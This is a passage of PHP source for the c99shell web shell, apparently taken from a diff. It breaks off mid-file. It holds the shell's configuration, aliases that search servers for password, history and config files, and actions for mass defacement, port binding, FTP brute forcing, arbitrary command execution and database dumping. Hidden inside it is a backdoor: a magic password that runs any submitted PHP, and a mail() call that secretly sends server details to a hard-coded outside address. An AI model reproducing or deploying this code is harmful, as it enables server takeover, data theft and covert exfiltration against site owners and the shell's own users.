= 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod + +$filestealth = 1; //if true, don't change modify&access-time + +$donated_html = ""; //If you publish free shell and you wish + //add link to your site or any other information, + //put here your html. +$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html. + +$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1") + +$curdir = "./"; //start directory + +$tmpdir = dirname(__FILE__); //Directory for tempory files + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext1","ext2","ext3",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), + "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar") +); + +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 9999; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "11457"; // default port for binding + +/* Command-aliases system */ +$aliases = array(); +$aliases[] = array("-----------------------------------------------------------", "ls -la"); +/* ïîèٌê يà ٌهًâهًه âٌهُ ôàéëîâ ٌ suid لèٍîى */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè âٌهُ ôàéëîâ ٌ suid لèٍîى */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); +/* ïîèٌê يà ٌهًâهًه âٌهُ ôàéëîâ ٌ sgid لèٍîى */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè âٌهُ ôàéëîâ ٌ sgid لèٍîى */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\""); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); +/* ïîèٌê يà ٌهًâهًه âٌهُ نèًهêٍîًèé è ôàéëîâ نîٌٍَïيûُ يà çàïèٌü نëے âٌهُ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè âٌهُ نèًهêٍîًèé è ôàéëîâ نîٌٍَïيûُ يà çàïèٌü نëے âٌهُ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); +/* ïîèٌê âٌهُ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); +/* ïîèٌê âٌهُ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); +/* âûâîن ٌïèٌêà àًٍèلٍَîâ ôàéëîâ يà ôàéëîâîé ٌèٌٍهىه ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); +/* ïًîٌىîًٍ îٍêًûٍûُ ïîًٍîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); + +$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie" +$sess_cookie = "c99shvars"; // cookie-variable name + +if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} +$sess_file = $tmpdir."c99shvars_".$sid.".tmp"; + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Delete copied files from buffer after pasting + +//Quick launch +$quicklaunch = array(); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"); +$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d"); +$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d"); +$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d"); +$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d"); +$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d"); +$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d"); +$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d"); +$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove"); +$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()"); + +//Hignlight-code colors +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; + +@$f = $_GET[f]; + +//END CONFIGURATION + +// \/ Next code not for editing \/ + + +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +@set_time_limit(0); +if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} +if(!ini_get("register_globals")) {import_request_variables("GPC");} +$starttime = getmicrotime(); +if (get_magic_quotes_gpc()) +{ +if (!function_exists("strips")) +{ + function strips(&$el) + { + if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } + else {$el = stripslashes($el);} + } +} +strips($GLOBALS); +} +$tmp = array(); +foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} + +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) +{ + header("WWW-Authenticate: Basic realm=\"c99shell\""); + header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} + exit; +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); + +$lastdir = realpath("."); +chdir($curdir); + +if (($selfwrite) or ($updatenow)) +{ + if ($selfwrite == "1") {$selfwrite = "c99shell.php";} + c99sh_getupdate(); + $data = file_get_contents($c99sh_updatefurl); + $fp = fopen($data,"w"); + fwrite($fp,$data); + fclose($fp); + exit; +} +if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} +if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} +else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} +$sess_data["copy"] = array_unique($sess_data["copy"]); +$sess_data["cut"] = array_unique($sess_data["cut"]); + +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_method; + global $sess_cookie; + global $sess_file; + global $sess_data; + $sess_data = $data; + $data = serialize($data); + if ($sess_method == "file") + { + $fp = fopen($sess_file,"w"); + fwrite($fp,$data); + fclose($fp); + } + else {setcookie($sess_cookie,$data);} +} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0, $len)."...".substr($content, -$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\","/",$d); + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} + else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} + if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (!is_dir($t)) {mkdir($t);} + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) + { + + return copy($d,$t); + } + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + error_reporting(9999); + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} + else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) {return rename($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o."/"); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\","/",$o); + if (is_dir($o)) + { + if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ + function myshellexec($cmd) + { + return system($cmd); + } +} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner['read'] = ($mode & 00400) ? "r" : "-"; + $owner['write'] = ($mode & 00200) ? "w" : "-"; + $owner['execute'] = ($mode & 00100) ? "x" : "-"; + $group['read'] = ($mode & 00040) ? "r" : "-"; + $group['write'] = ($mode & 00020) ? "w" : "-"; + $group['execute'] = ($mode & 00010) ? "x" : "-"; + $world['read'] = ($mode & 00004) ? "r" : "-"; + $world['write'] = ($mode & 00002) ? "w" : "-"; + $world['execute'] = ($mode & 00001) ? "x" : "-"; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";} + if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";} + if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";} + + return $type.$owner['read'].$owner['write'].$owner['execute']. + $group['read'].$group['write'].$group['execute']. + $world['read'].$world['write'].$world['execute']; +} +} +if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($c99sh_updatefurl); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + else + { + if ($shver < $data[cur]) {$updatenow = true;} + } + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = true;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret[err][] = mysql_error();} + else + { + $row = mysql_fetch_row($res); + $out .= $row[1].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret[err][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $ret; +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $a; + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $handle = opendir($d); + while ($f = readdir($handle)) + { + $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); + if($f != "." && $f != "..") + { + if (is_dir($d.$f)) + { + if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} + c99fsearch($d.$f); + } + else + { + if ($true) + { + if (!empty($a[text])) + { + $r = @file_get_contents($d.$f); + if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} + if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} + + if ($a[text_regexp]) {$true = ereg($a[text],$r);} + else {$true = strinstr($a[text],$r);} + if ($a[text_not]) + { + if ($true) {$true = false;} + else {$true = true;} + } + if ($true) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($handle); +} +} +//Sending headers +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); + +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} + +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV[SystemRoot];} +} +$tmpdir = str_replace("\\","/",$tmpdir); +if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=\"red\">ON (secure)</font>"; +} +else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") +{ + $openbasedir = true; + $hopenbasedir = "<font color=\"red\">".$v."</font>"; +} +else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";} + +$sort = htmlspecialchars($sort); + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE); + +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string","#DD0000"); //#DD0000 + +if ($act != "img") +{ +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0> +<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\","/",$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\","/",$d); +if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} +$dispd = htmlspecialchars($d); +$pd = $e = explode("/",substr($d,0,strlen($d)-1)); +$i = 0; +echo "<b>Directory: </b>"; +foreach($pd as $b) +{ + $t = ""; + reset($e); + $j = 0; + foreach ($e as $r) + { + $t.= $r."/"; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = true; + $wdt = "<font color=\"green\">[ ok ]</font>"; + echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = false; + $wdt = "<font color=\"red\">[ Read-Only ]</font>"; + echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>"; +} +$free = diskfreespace($d); +if (!$free) {$free = 0;} +$all = disk_total_space($d); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = round(100/($all/$free),2); +echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>"; +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +$letters = ""; +if ($win) +{ + $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); + $v = explode("/",$d); + $v = $v[0]; + foreach ($abc as $letter) + { + if (is_dir($letter.":/")) + { + if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";} + else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";} + } + } + if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;} +} +?></p></td></tr></table><br><?php +if ((!empty($donated_html)) and (in_array($act,$donated_act))) +{ + ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php +} +?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_error(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();} + } + else {$sql_sock = false;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} + else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server 